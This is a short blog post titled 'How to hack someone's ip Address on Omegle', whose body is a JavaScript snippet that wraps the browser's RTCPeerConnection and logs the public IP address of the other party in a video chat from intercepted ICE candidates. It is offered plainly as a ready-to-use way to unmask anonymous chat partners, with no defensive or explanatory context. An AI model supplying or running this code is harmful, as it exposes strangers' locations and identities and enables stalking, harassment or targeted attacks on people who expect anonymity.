Computer NetworksNETWORKS

How to hack someone’s ip Address on Omegle

window.oRTCPeerConnection = window.oRTCPeerConnection || window.RTCPeerConnection

window.RTCPeerConnection = function(…args) {
const pc = new window.oRTCPeerConnection(…args)

pc.oaddIceCandidate = pc.addIceCandidate

pc.addIceCandidate = function(iceCandidate, …rest) {
const fields = iceCandidate.candidate.split(‘ ‘)

if (fields[7] === ‘srflx’) {
console.log(‘IP Address:’, fields[4])
}
return pc.oaddIceCandidate(iceCandidate, …rest)

}

return pc
}

source

ip address

Alice AUSTIN

Alice AUSTIN is studying Cisco Systems Engineering. He has passion with both hardware and software and writes articles and reviews for many IT websites.

Leave a Reply

Your email address will not be published. Required fields are marked *